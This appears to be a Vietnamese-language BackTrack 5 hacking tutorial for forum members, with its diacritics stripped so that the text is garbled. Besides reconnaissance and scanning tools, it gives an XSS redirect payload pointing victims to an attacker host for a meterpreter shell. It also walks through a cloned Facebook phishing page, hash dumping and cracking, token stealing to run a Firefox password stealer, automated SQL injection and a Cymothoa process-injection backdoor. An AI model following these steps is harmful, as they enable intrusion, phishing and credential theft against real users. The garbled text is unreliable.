You are on page 1of 27

Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 1






Ti liu hng dn s dng
BackTrack 5 Ting Vit
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 2

Mc lc
Li ni u ................................................................................................................................................... 3
Phn I : Thu thp thng tin v gii thiu v cc cng c VA ................................................................. 4
1. Thu thp thng tin : ......................................................................................................................... 4
2. nh gi l hng : ........................................................................................................................... 6
Phn II : Cc b cng c khai thc ( exploit tools ) v frameworks ..................................................... 10
1. B cng c Metasploit Armitage : ................................................................................................. 10
2. B cng c Social-Engineer Tookit : ............................................................................................ 11
3. B cng c leo thang c quyn (Privilege escalation tools ) : .................................................... 12
4. B cng c J ohn the Ripper : ........................................................................................................ 13
Phn III : Cc b cng c khai thc v frameworks tip theo ........................................................... 15
1. nh cp cc thng tin t trnh duyt : ....................................................................................... 15
2. Thc nghim k thut nh cp thng tin : ................................................................................ 15
3. B cng c Hashcat trong BackTrack 5 : ..................................................................................... 17
4. Thc nghim k thut leo thang c quyn : .............................................................................. 18
5. Khai thc SQL I njection trong BackTrack 5 : .............................................................................. 18
6. S tht bt ng ng sau cc cng c mang tn khai thc t ng : .......................................... 19
Phn IV : Lm th no n mnh ......................................................................................................... 20
1. Ti sao phi n mnh ? .................................................................................................................. 20
2. OS backdoor Cymothoa : .......................................................................................................... 20
3. Meterpreter c phi l backdoor : ................................................................................................. 22
4. Li dng l hng c backdoor : ................................................................................................ 23
Phn V : Chi tit mt cuc tn cng gi nh ......................................................................................... 24
1. B cng c Autoscan Network trong BackTrack 5 : .................................................................... 24
2. Ti nguyn l hng trc tuyn : .................................................................................................... 24
3. Pentest mc tiu : ........................................................................................................................... 25
4. Xa b du vt : .............................................................................................................................. 26
5. Tng quan v m hnh bo mt Windows :................................................................................... 26



Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 3

Li ni u
Ti liu hng dn ny cutynhangheo dnh tng cho anh em HCEGroup v TheGioiMang.OrG nhn
ngy reopen ca 2 din n thn yu ni trn .V cutynhangheo c i li tm s vi anh em mi vo
chi tr ngh thut ny ci nh .Trong ngh thut hack khng c ci gi l s li bing v chy , anh
em nn quan nim 1 iu khi ta cm thy tha mn vi nhng g ta ang c tc l lc ta bt u lc
hu vi th gii .Trong ngh thut hack kin thc, k nng, t duy, s ranh ma v thm mt cht may mn
lun lun i chung vi nhau .V vy nu ta cm thy mnh c c nhng g mnh mun th lc
mnh bt u mt tt c .Cutynhangheo cng xin ni rng ti liu ny ch dng tham kho v s dng
thc nghim tn cng ( pentest ) trong mi trng lab hoc c quan, t chc c nhu cu tn cng thc
nghim trn h thng ca chnh h .Kin thc trong cun sch hng dn ny do cutynhangheo thu thp
v tham kho nhiu ngun trn Internet, chn thnh cm n cc tc gi v ngun ti liu m
cutynhangheo tham kho qua .
Ln na cutynhangheo xin nhc li ti liu ny cutynhangheo bin dch li v cung cp cho anh em
ch nhm mc ch hc tp v nghin cu, cutynhangheo khng chu trch nhim vic anh em s dng
kin thc, k thut v t duy trong cun ti liu ny dng vi phm php lut nc Cng Ha X Hi
Ch Ngha Vit Nam .Mi hnh vi mo danh hay s dng cc kin thc ni trn cutynhangheo khng chu
trch nhim trc php lut .

Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 4

Phn I : Thu thp thng tin v gii thiu v cc cng c VA
Phin bn BackTrack 5 c tn m l Revolution ( tm dch l Ci tin ), phin bn ny rt c
gii bo mt (nht l gii Hack) mong i; phin bn ny c pht hnh vo thng 05 nm 2011 .So vi
phin bn BackTrack 4 R2 th phin bn ny c nhiu s pht trin mnh m hn rt nhiu .Phin bn
BackTrack 5 ny c cho rng cc nh pht trin xy dng li t u, cung cp cho chng ta nhng
ci tin tt hn v cng nh fix cc li so vi phin bn BackTrack 4 R2 trc .
BackTrack 5 c t tn theo mt thut ton c gi l backtracking .BackTrack 5 cung cp
mt b cc cng c t crack password, pentest v scan ports .BackTrack 5 c 12 b cc cng c c th
hin nh hnh 1 bn di .

Hnh 1 : Cc b cng c trong BackTrack 5
Ngi kim tra bo mt ( tm gi l Pentester vi nhng ngi nh anh em chng ta tm gi l
sript kiddies, ni dn d 1 t l dn i hack, cutynhangheo xin nhc li l chng ta cha phi l hacker
thc th OK ! ) thng thc hin cc qu trnh tn cng thc nghim theo 5 bc ( ty vo tng mi
trng v trng hp c th c th nhiu hn 5 bc ) nh sau :
1. Bc 1 l thu thp thng tin ca h thng cn tn cng thc nghim .
2. Bc 2 l scan bugs ( qut li ) v nh gi cc im yu c th c ca h thng cn tn cng
thc nghim .
3. Bc 3 l tip cn vi h thng cn tn cng thc nghim thng qua cc im yu c th c
ca h thng .
4. Bc 4 l duy tr truy cp vi h thng cn tn cng thc nghim ( ni c v khn khn nhng
cutynhangheo ngh y l bc to 1 backdoor cho ln truy cp sau vo h thng ) .
5. Bc 5 l xa b tt c cc du vt ( trong phim th gi l phi tang, dit chng; hehehe ) .
Trong phn hng dn tn cng thc nghim ( pentest ) vi BackTrack 5 ny, chng ta s cng xem
xt qua phn thu thp thng tin v b cng c nh gi cc l hng ( nu c ) c cung cp trong phin
bn BackTrack 5 ny nh .
1. Thu thp thng tin :
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 5

Thu thp thng tin l bc tin hnh u tin v cc k quan trng trong qu trnh tn cng thc
nghim .Trong bc ny, pentester v attacker s thu thp v c c cc thng tin s b ca mc
tiu cn tn cng nh h thng mng mc tiu, cc cng ang m, h thng my ang live v cc
dch v ang chy trn tng cng .Theo bn ta thu thp c g ? Rt n gin ta s c c 1
bng thng tin v s cu trc ca mc tiu, bn cnh ta cn c thng tin v cc h thng v h
thng mng ang c s dng ca mc tiu .Hnh 2 bn di y l hnh chp ca cng c Zenmap,
BackTrack cung cp cng c ny gip pentester v attacker c th thu thp c thng tin v
phn tch h thng mng ca mc tiu .

Hnh 2 : Cng c Zenmap UI trong BackTrack 5

Cc ch scan ca Zenmap s cung cp cho ta thng tin v mc tiu nh dch v ang chy
trn tng cng, phin bn h iu hnh ca mc tiu, ng i n mc tiu, workgroups v ti
khon ngi dng .Cc thng tin ny thc s hu ch vi phng php white box testing ( tt
nhin cng hu ch vi attacker ) .
Mt cng c thu thp thng tin khc trong BackTrack 5 l CMS identification v IDS IPS
identification dng thu thp thng tin v phn tch cho ng dng web .CMS identification s cung
cp cc thng tin s b v h thng CMS mc tiu, b cng c ny c th c dng nh gi cc
l hng trn h thng CMS v iu thun tin nht l b cng c ny cung cp cc exploit ( khai thc
) c sn pentester v attacker c th kim tra trn h thng mc tiu .Cc cng c nh joomscan (
CMS Joomla ) s c ni sau trong phn hng dn ny .
Mt cng c th v v cc k mnh khc na l Maltego, cng c ny thng dng phn tch
v SMTP .Hnh 3 bn di cho thy Maltego ang hot ng .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 6


Hnh 3 : Cng c Maltego UI trong BackTrack 5

Trn bng Palette ca Maltego cho ta thy cc thng tin nh DNS Name, Domain, Location,
URL, email v cc thng tin chi tit khc v website .Maltego s dng cc ty bin khc nhau trn
cc entities cung cp cho pentester v attacker cc thng tin chi tit cn thit v mc tiu .Maltego
cung cp mt kt qu trc quan bng giao din ha v cc thng tin thu thp c ca mc tiu .

2. nh gi l hng :
Bc th 2 trong tn cng thc nghim pentest l nh gi cc l hng ( nu c ) .Sau khi
thc hin bc u tin thnh cng .
Thng tin v s t chc ca mc tiu c c thng qua footprinting ( nh hi xa
cutynhangheo c n y c nh nh l in du n ), lc ny chng ta s tin hnh nh gi phn
tch cc im yu hoc cc l hng trong h thng cn tn cng .Trn internet hin nay c rt nhiu
trang web v bo mt cung cp danh sch cc l hng c th s dng khai thc, nhng chng ta s
ch tp trung vo nhng g BackTrack 5 cung cp trong series hng dn ny nh .
Web application scans c s dng nh gi v tm cc l hng ca ng dng web .Hnh 4
bn di y gii thiu v cng c joomscan trong BackTrack 5 .Joomscan c tnh nng l s dng
cc l hng c cung cp trong ti nguyn tm kim l hng ca website chy trn nn Joomla .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 7


Hnh 4 : Cng c Joomscan

Joomscan s dng cu lnh nh sau :


./joomscan.pl u <string> -x proxy:port


Phn <string> chnh l Website chy Joomla cn tn cng .Joomscan c cc ty chn km theo
nh sau kim tra phin bn ca Joomla, kim tra Server, kim tra Firewall ang hot ng Nh
hnh 4 trn Website Joomla mc tiu ang chy trn my ch web Apache Server v phin bn PHP
ang s dng l 5.5.16 .
OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : M Application
Backtrack Vulnerability scanners OpenVAS s cung cp cho bn mt danh sch cc ty chn
nh hnh 5 bn di .

Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 8


Hnh 5 : Cc ty chn ca OpenVAS trong BackTrack 5 .

OpenVAS l mt cng c mnh trong vic phn tch v nh gi l hng i vi mc tiu cn tn
cng .Nhng trc khi s dng b cng c ny nh cung cp khuyn co bn cn thit lp chng
thc vi ty chn OpenVAS MkCert .Sau , chng ta cn to mt ti khon ngi dng mi t trnh
menu nh trong hng dn ny .
Ngi dng c th ty chnh p dng cc rule ca mnh, hoc s c cung cp mt tp hp
rng bng cch nhn t hp phm Ctrl + D .Khi mt ngi dng mi c thm vo vi cc thng
tin ng nhp, chng ta c th bt u s dng b cng c ny .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 9


Hnh 6 : Qu trnh thm ti khon ca OpenVAS

OpenVAS hot ng nh gi l hng trn m hnh Client/Server .Bn nn cp nht thng
xuyn danh sch cc l hng mi cho th vin ca OpenVAS c th thc hin cc bc kim tra c
hiu qu nht .
OpenVAS v Nessus Scanner :
Nessus Scanner l b cng c phn tch v nh gi l hng t ng .Chng ta hy lt qua
xem s khc bit gia 2 b cng c ny .
Nessus Scanner c 2 phin bn, min ph v tr tin ( ci v ny lm nhiu dn i hack nh
chng ta v cng i ngi nh ! Cha hack m tn tin ri ), trong khi OpenVAS th li hon
ton min ph ( ci ny c h nghen, ng bao gi c suy ngh free l ci anh em nh, c
nhng free m cht lng ngon hn hn tr tin ng hong, m xi free th cc bc
mun nh bn quyn cng chng c c g xi c anh em ta ) .Theo nh gi gn y cho bit
th cc ti nguyn cung cp cc plugins cho 2 b cng c ny c s khc nhau ng k, v ty
thuc vo nhn nh ca mi ngi s a ra nhn xt l s c 1 b cng c c khuyn khng
nn s dng, tt nhin 1 chng trnh scan t ng s c th a ra nhng nh gi sai lm, iu
ny l khng th trnh khi ( anh em s hi cutynhangheo ti sao sai lm cn gii thiu,
cutynhangheo xin tr li v bn cht chng trnh do con ngi lp trnh ra, n ch bit lm theo
ch n khng c suy ngh nh con ngi nh ).
Trn internet c rt nhiu nhm c lp ra hng dn cho nhau cch s dng cc b
cng c h tr khc, tt nhin c c cc b cng c scan t ng, nhng cutynhangheo xin
khuyn co vi anh em nh sau ta ch s dng cc b cng c scan t ng nh gi ton din
cc l hng ca cc mc tiu cn tn cng .BackTrack 5 cng cung cp cc b cng c khc
cng th loi nh cc b cng c CISCO, ngha l cc b cng c ny c s dng tm l
hng trn h thng mng chy phn cng CISCO .Cc Fuzzer cng c cung cp, c phn
thnh 2 loi Network Fuzzers v VOIP Fuzzers .
l iu gii thch ti sao BackTrack 5 c cung cp rt nhiu b cng c thu thp thng
tin v nh gi l hng .Trong phn hng dn ny cutynhangheo s c gng gii thiu mt hoc hai
b cng c m cutynhangheo cm thy hu dng cho anh em nh ( cn li nu anh em mun nng
cao skill th lm n t ln Google Search dm ci h, c 1 cu ngn ng Ti ch cho ci cn cu
ch ti khng cho con c ) .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 10

Phn II : Cc b cng c khai thc ( exploit tools ) v frameworks
Trong phn u ca cun hng dn v BackTrack 5 ny, chng ta i qua 2 bc l thu thp
thng tin v nh gi l hng vi cc b cng c c gii thiu trn .Trong phn hai ny, chng ta s
c gii thiu v cc b cng c khai thc cc l hng t xa v tm hiu lm th no s dng cc
exploitation frameworks leo thang c quyn v d nh s dng John the Ripper crack mt khu v
truy cp vo mt h thng Windows t xa nh .
1. B cng c Metasploit Armitage :
Metasploit Armitage l phin bn giao din ha ca b cng c khai thc l hng ni ting
Metasploit Framework .Cutynhangheo s vit mt series v hng dn s dng Metasploit trong thi
gian sp ti v s cung cp sm cho anh em .Trong cun sch hng dn v BackTrack 5 ny, chng
ta s c gii thiu cch s dng autopwn khai thc l hng trnh duyt trn h thng Windows
XP bng b cng c Metasploit Armitage .

Hnh 7 : B cng c Metasploit Armitage ; h thng Windows b xm nhp t xa c th hin bng mu
.Giao din console bn di cho thy qu trnh s dng autopwn khai thc l hng trnh duyt trn
h thng Armitage cng thu thp c thng tin v h iu hnh ca mc tiu tn cng .

Vi phn hng dn khai thc ny, anh em cn 1 website b li cross-site scripting ( XSS ) vi l
hng l URL redirection ( chuyn hng URL ) .Khi victim nhp chut vo 1 URL c th no trn
trnh duyt, h thng ca victim s to ra mt meterpreter shell .on code URL redirection s c
dng nh sau :


http://www.xyz?c="><meta HTTPEQUIV="REFRESH" content="0; url=http://attacker">


Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 11

Tnh nng auto-migration c s dng khai thc s to ra mt tin trnh mi trn h thng
victim, bi v nu nh chng ta s dng phng php khai thc l hng khng s dng migration, th
cuc tn cng s b hy b hoc kt thc khi ngi dng ng trnh duyt .V vy Migration s gip
chng ta duy tr trng thi kt ni lin tc vi h thng victim cho d victim c ng trnh duyt i
chng na .

Hnh 8 : Mt minh ha v URL redirection t 1 website b li XSS , xyz.com, n 192.168.13.132 attacker

2. B cng c Social-Engineer Tookit :
B cng c Social- Engineer Tookit ( SET ) s c cutynhangheo gii thiu chi tit trong mt
cun sch hng dn khc trong thi gian sp ti .Trong phn hng dn BackTrack 5 ny, chng ta
s tp trung vo kiu tn cng c gi l tab nabbing .Trong mt cuc tn cng gi nh, victim m
1 lin kt trn trnh duyt, ngay sau khi victim chuyn sang 1 tab khc, trang web ban u s c
thay th bng 1 trang web gi mo, kiu tn cng ny cho php cc attacker c c cc thng tin
ng nhp ca victim .Victim s b nh la nhp tn ti khon v mt khu ca anh ta vo trang
gi mo ny .
Trong kiu tn cng social engineer ny, chng ta s chn 1 website tn cng vector v
clone trang web .Chng ta cn xc nh nhng trang web no chng ta cn clone, c cc form
ng nhp thng tin m chng ta mong mun .Cutynhangheo clone 1 trang ca Facebook cho
phn hng dn BackTrack 5 ny vi mc ch ch l trnh din ( cutynhangheo khng khuyn khch
anh em lm iu tng t ) .Xin lu anh em rng qu trnh clone s khng c tc dng khi chng ta
khng c kt ni internet nh .
Hnh 9 bn di cho thy trang ng nhp Facebook gi mo, v hnh 10 bn di cc d liu
gi qua phng thc POST b SET bt li .
Phng php tn cng ny c th m rng vi cc URL m anh em d tnh clone, cc trang web
s dng phng thc POST y d liu, thng tin s lun b thu thp li bi HTTP hoc
HTTPS .SET h tr tt 2 giao thc trn, v cho kt qu tt khi sniffs thng tin ng nhp .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 12


Hnh 9 : Mt trang ng nhp gi mo Facebook c to ra bi b cng c Social-Engineer Toolkit vi
cc ty chn c cu hnh bi attacker .

Hnh 10 : D liu POST b thu thp bi b cng c Social-Engineer Toolkit framework t 1 trang ng
nhp gi mo Facebook .

3. B cng c leo thang c quyn (Privilege escalation tools ) :
Chng ta bit rng khng phi lc no chng ta cng c quyn administrator hay superuser
c th xm nhp vo mt h thng t xa c ( d n qu th khng cn g l th v OK ! ) .Ging nh 1
attacker, chng ta cn mt quyn ti a trn h thng victim c th thc thi cc payloads v thc
hin cc hnh ng chng ta mong mun ( v d leo ln quyn administrator hay get root g )
.BackTrack 5 cung cp cho chng ta 1 lot cc b cng c leo thang c quyn p ng nhng
nhu cu thc tin ny, ging hnh 11 bn di .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 13


Hnh 11 : Cc phn loi trong b cng c leo thang c quyn trong BackTrack 5 .

Nh trn hnh 11 chng ta thy, BackTrack 5 cung cp 4 phn loi trong b cng c leo thang
c quyn, mi loi u c cch lm vic khc nhau ( hiu ht cc phn loi ny, cutynhangheo
ngh anh em s dng cm nhn ) .

4. B cng c J ohn the Ripper :
Mt khi victim b xm nhp ( cutynhangheo ngh anh em cha bit lm sao xm nhp xin
c li cun hng dn s dng SET v MSF ca cutynhangheo bit thm chi tit nh, khng gii
thch trong phn hng dn ny mt lm ), cc cracker thng s dng b cng c John the Ripper
crack cc Password Windows hashes t s dng leo thang c quyn v c c quyn
qun tr h thng .
Sau khi khai thc qua l hng, cc pass hashes ny s c dump li thnh 1 file text v cung cp
cho John the Ripper .John the Ripper l b cng c rt mnh v vic crack cc password hashes
.Hnh 12 v 13 bn di th hin qu trnh crack password hashes lin quan n vic leo thang c
quyn trn h thng Windows .Cuc tn cng nh demo c th s dng 2 b cng c Metasploit
Framework hay Social-Engineer Toolkit .

Hnh 12 : y l qu trnh dump password hashes bng b cng c hashdump, kt qu ny s xut ra file
text cung cp cho John the Ripper thc hin crack pass .

H thng victim theo nh hnh bn di s c lit k danh sch cc ti khon v mt khu theo
cch ca John the Ripper .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 14


Hnh 13 : Danh sch c sp xp theo Username:Password

Vi mt khu c trn th vic leo thang c quyn trn h thng victim lc ny qu tht qu n
gin anh em nh .Trong phn h b cng c phn tch cc giao thc, chng ta c 1 b cng c l
WireShark, b cng c ny c xp u bng trong cc cng c phn tch lung cc traffic trn h
thng mng .Cutynhangheo s c gng hon thin cun sch ni v b cng c WireShark ny trong
thi gian sm nht cho anh em.
y l bng chng cho vic BackTrack 5 pht trin rt rt nhiu .Mt attacker thng minh v
ranh ma c th tn dng v s dng ti a cc b cng c ny, v attacker c th kt hp chng li
a dng ha v ti a ha cho li ch ca attacker .Trong phn hng dn ny, cutynhangheo xin
nhn mnh li vic quan trng nht trong mt cuc tn cng gi nh l s dng cc cng c leo
thang c quyn .Trong phn hng dn tip theo cutynhangheo s cung cp thm cho anh em mt s
k thut leo thang c quyn khc na ( bit c nhiu hn ch c chm ch, cn c ngi c v
search gio s Google nh ) .
















Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 15

Phn III : Cc b cng c khai thc v frameworks tip theo
Khi BackTrack 5 pht hnh vo thng 05 nm 2011, c rt nhiu b cng c pentest frameworks
c ch i .Chnh i ny khin cutynhangheo quyt tm vit phn hng dn s dng BackTrack 5
phn th 3 ny cng anh em tm hiu v khm ph cc b cng c khai thc cc li ca trnh duyt
chng hn nh nh cp thng tin quan trng, leo thang c quyn Website v khi phc mt khu .y
l mt phn trong cun sch hng dn s dng BackTrack 5 ny, cutynhangheo s cung cp cho anh em
ci nhn tng quan v khai thc t ng vi li SQL Injection bng cch s dng b cng c
DarkMySQLi .

1. nh cp cc thng tin t trnh duyt :
Phn hng dn trc cutynhangheo c gii thiu qua v cch khai thc mc tiu victim
bng cch s dng cc payloads .Trong phn ny cutynhangheo s s dng cc modules ca
Metasploit Framework tn cng h thng Windows, nh cp cc thng tin trnh duyt lu tr
trong Mozilla Firefox chy trn h thng Windows XP .Mt b cng c ca nh cung cp th 3 c tn
gi l Firepassword s ly tt c thng tin mt khu c lu tr trn trnh duyt Mozilla Firefox
trn h thng victim .
Chng ta s s dng l hng ph bin l WinXP RPC DCOM khai thc v xm nhp h thng
victim, khi to 1 Metasploit Shell v thc hin cc bc khai thc thng tin .Nu victim c s
dng tnh nng Master Password trong Mozilla Firefox, y l thng tin quan trng nht ta cn phi
ly u tin, v nu ta c Master Password ta c th xem c cc mt khu khc trong Mozilla
Firefox 1 cch cc k d dng .Thng thng th Master Password rt t khi c s dng, chnh v
th iu ny cho php chng ta c th d dng ly cc thng tin c lu tr trong trnh duyt .

2. Thc nghim k thut nh cp thng tin :
Mc tiu cn t n ca pentester v hacker m en l ging nhau v phng thc thc hin, c
th l xm nhp vo h thng mng v nh cp thng tin d liu .Tuy nhin, vi hacker m en h
s em thng tin em bn cho nhng ai cn n hoc s dng cho mc ch khc, th pentester s
thng bo cc d liu b nh cp cho c quan, t chc yu cu anh ta thc hin qu trnh
pentest, vi tnh ton vn, bo mt v trch nhim .
Cc thng tin thng b nh cp nht bao gm thng tin c nhn v thng tin ny c th s dng
cho kiu tn cng social engineering, th tn dng hoc cc thng tin chi tit v ti chnh; v c th
c c bin lai v ha n hoc cc thng tin nhy cm ca cng ty trong hp th email .Ni chung
mi th nhy cm th hacker m en h u mun nh cp .
V vy, kim tra bt k cc d liu c th s b nh cp l mt bc rt quan trng trong qu
trnh pentest, n chnh l mt bo co y v trung thc nht cho c quan, t chc .Hnh 14
bn di cho thy s thit hi s c ca victim .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 16


Hnh 14 : Qu trnh xm nhp thnh cng trn h thng Windows XP .

Ti y, nh phn ni trn, chng ta s thc hin ti firepassword.exe ln h thng ca victim
thc hin qu trnh nh cp mt khu c lu tr trn Firefox .
S dng cu lnh upload thc hin qu trnh ti file ln trong mi trng meterpreter shell .
Mt file Firepassword c ti ln ( Hnh 15 ) .V d liu s c nhn thy nh hnh 16 .

Hnh 15 : File Firepassword.exe c ti ln thnh cng trn h thng victim .

By gi chng ta ch cn chy file Firepassword.exe thy c cc mt khu c trong h
thng .Nhng ( h h anh em nn nh khng c ci g c gi l n gin trong tr chi c, nht
l trong ngh thut hack nh, nu n gin v d lm th c khi ngi lm c khng n phin
chng ta nh ) c mt iu cn phi ch y .iu ny s hu ch cho t duy ca anh em ( nu
anh em xem hack l mt nim am m nh ), l chng ta cn kim tra cp ngi dng ca
victim mt khi anh em xm nhp vo h thng ca victim .V d di y s gii thch cho anh em
d hiu hn nh, khi ta xm nhp vo h thng Windows XP vi quyn System, nhng cho file
Firepassword.exe chy c ta cn phi c quyn Administrator .Do , thay i cp ngi
dng chng ta c th s dng phng php sau .

2.1. S dng cu lnh ps trong mi trng meterpreter lit k tt c cc tin trnh ang thc
hin trn h thng victim theo PIDs, tm tin trnh explorer.exe hoc bt k mt tin trnh no
ang thc hin vi quyn Administrator .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 17

2.2. By gi chng ta sao chp PID ny v s dng cu lnh steal_token thay i cp
quyn ca user thnh quyn Administrator .
2.3. kim tra quyn user hin ti m anh em ang truy cp, s dng cu lnh getuid trong mi
trng meterpreter shell .
Mt khi tr thnh Administrator, anh em chy file Firepassword.exe m Windows shell
trong mi trng meterpreter v kim tra cc mt khu c lu tr nh trong hnh 16 bn di y.

Hnh 16 : Cc ti khon v mt khu c lu tr c hin th khi s dng Firepassword.exe

i vi hng dn trn, anh em cn lu mt iu l tin trnh ch c thc hin thnh cng
khi anh em bit c Master password trong trnh duyt Mozilla Firefox .Chn trong s mi ln
thc hin th cutynhangheo nhn thy tnh nng Master password t c ngi s dng lu tm m
thit lp n, v cc thng tin c th s b nh cp .V vy, trong tr chi ny lun lun km theo tnh
may mn nh anh em .
Ngoi ra cng c mt s b cng c khc c cung cp bi bn th 3 dng nh cp cc mt
khu trn cc trnh duyt khc na .

3. B cng c Hashcat trong BackTrack 5 :
Hashcat l b cng c min ph, c nhiu ci tin, a nn tng, cng c phc hi mt khu trn
nhiu h iu hnh .Cc nn tng c h tr bao gm CUDA, OpenCL v CPU, v mt s khc
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 18


Hnh 17 : Cc cu lnh ca Hashcat trong BackTrack 5
Trong phn hng dn ny, nh trn hnh 17 anh em c th thy c c php s dng
Hashcat vi li ch thch r rng cho mi ty chn .Cc ty chn ny c phn loi nh sau :

3.1. Khi ng chng trnh .
3.2. ng nhp v cc file ca chng trnh .
3.3. Qun l ti nguyn h thng .
3.4. Cc kiu tn cng, bao gm brute force, table lookups v permutations .

4. Thc nghim k thut leo thang c quyn :
Mt cuc tn cng thng theo cc cch ch yu nh sau ngha l khi xm nhp vo h thng
victim anh em thng s c quyn hn user rt thp hoc c th ni l bnh thng .Bc sau , l
cn kim tra cc l hng local ta c th t leo thang ln quyn cao nht ca h thng victim
.iu ny cc k quan trng, ta c c cc quyn nh mong mun, yu cu chng ta cn thc
hin qu trnh nh gi mc an ninh ca h thng victim .Cc b cng c nh Backtrack
Privilege escalation Online attacks / Offline attacks c pht trin lm nhng vic ny.
Hu ht cc tin trnh trong h thng Windows u c th c thc thi vi quyn
Administrator, nhng mt s t, quyn system li c thc thi .BackTrack 5 c cc b cng c
nh meterpreter to iu kin thun li leo thang c quyn .

5. Khai thc SQL Injection trong BackTrack 5 :
SQL Injection c xp hng s 1 trong OWASP Top 10 l hng v bo mt trong ng dng web
.N c th c thc hin khai thc bng tay hoc bng cc b cng c khai thc t ng .Phng
php khai thc bng tay th cc k nhm chn v mt thi gian ca anh em ta ( ci ny ng vi cc
ng ch chi UG nh ), trong khi phng php khai thc t ng th nhanh hn, thn thin vi
ngi s dng v c nhiu hiu qu hn ( chun khng cn chnh ) .Havij l mt trong nhng cng
c khai thc SQL Injection t ng nh ni trn .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 19

Trong phn hng dn ny chng ta ch cp n b cng c DarkMySqli dng SQL
Injection t ng vo website victim .
Cu trc cu lnh nh sau :


python DarkMySQLi.py u http://target


B cng c ny s scan ton b website victim, bng cch s dng cu lnh trn trong console
.ng dn y ca b cng c trn trong BackTrack 5 l /pentest/web/DarkMySQLi .

6. S tht bt ng ng sau cc cng c mang tn khai thc t ng :
Hin nay c rt nhiu nh cung cp bn cc sn phm pentest t ng vi li mi cho nh R
hn, Nhanh hn v Chnh xc hn .Vi vic chi ph v thi gian b hn ch, tt nhin cc nh
cung cp ny s l la chn hng u .Nhng chng ta cn c ci nhn tng quan v cc cng c
pentest t ng nh sau n s lm mi ngi c ci nhn sai v bo mt, n thu hp khong cch,
khng cn bn phi c kin thc v IT v chnh sch bo mt .Mi ngi cn c nh gi khch quan
v u v khuyt im ca mt trong hai phng php m cutynhangheo gii thiu trn, v cng
cn da trn nhu cu thc t ca c quan, t chc .
Trong phn hng dn ny, chng ta c gii thiu s qua v Web exploitation framework,
nh cp thng tin trnh duyt bng cc b cng c ca nh cung cp th 3, v ti chng ln h
thng ca victim .Trong phn hng dn sp ti cutynhangheo s gii thiu cc kha cnh khc ca
lnh vc an ton thng tin, forensics v reverse engineering .















Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 20

Phn IV : Lm th no n mnh
Trong phn hng dn trc, chng ta c gii thiu s qua v cc phng php thu thp thng
tin v nh gi l hng ca h thng mc tiu, phn tch h thng mng, scan v truy cp vo mc tiu,
v mt s cng c v leo thang c quyn .Trong phn ny chng ta s xem xt qua vn lm th no
n mnh .

1. Ti sao phi n mnh ?
Mc ch ca vic pentest l lp li cc hnh ng ca nhng attacker c s dng m c
.Khng mt attacker no mun mnh b pht hin khi xm nhp tri php vo mt h thng mng, v
vy k thut n mnh lun lun c attacker s dng n .Khi pentester thc hin qu trnh xm
nhp cng phi s dng k thut n mnh ging nh vy, nh gi h thng mt cch trung thc
nht .

Hnh 18 : B cng c Maintainning Access trong BackTrack 5, chng ta tp trung vo phn OS
Backdoors .

Trong phn ny s hng dn anh em lm th no s dng tnh nng Maintainning Access,
trong s c cc ty chn nh OS Backdoors, Tunneling v Web Backdoors nh hnh 18 .

2. OS backdoor Cymothoa :
Cymothoa l b cng c dng n backdoor trong BackTrack 5, c ngha l backdoor shell
code s c chn vo trong mt tin trnh ang tn ti .B cng c ny c pht trin bi
codewizard v crossbrowser ca ElectronicSouls .
Cc ty chn ca b cng c c s dng nh sau :


Cymothoa p <pid> -s <shellcode number> [options]


Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 21

Cymothoa c cung cp bao gm cc payloads c sn .Chng c nh s t 0 14 .B cng
c ny c rt nhiu ty chn bao gm nh ty chn chnh, ty chn inject v cc ty chn v
payloads .

Hnh 19 : Trn y l qu trnh chy Cymothoa vi pid 1484 v lng nghe port 100

Nh hnh 19 bn trn, th hin cc hnh ng ca Cymothoa, cc kt qu vi port 100 ti tin
trnh 1484 .

Hnh 20 : Trc khi chy Cymothoa .

Hnh 21 : Sau khi chy Cymothoa .

Khi chng ta thc hin qu trnh chn shell code vo, chng ta c th s dng lnh netstat l
hin th cc port 100 no ang c lng nghe, vi hnh 21 y l kt qu sau khi chng ta chn
shell code numbered 0 vo tin trnh 1484 .V vy chng ta c th thy rng, chng ta c th chy
Cymothoa trn bt k h thng no v c th ly nhim vo bt k mt cng dch v no ca h thng
v chng ta c th maintaining access vo h thng bt k lc no .Victim s khng h hay bit
s tn ti ca backdoor, ngoi tr victim pht hin hay nghi ng mt iu bt thng no trn h
thng ca h .
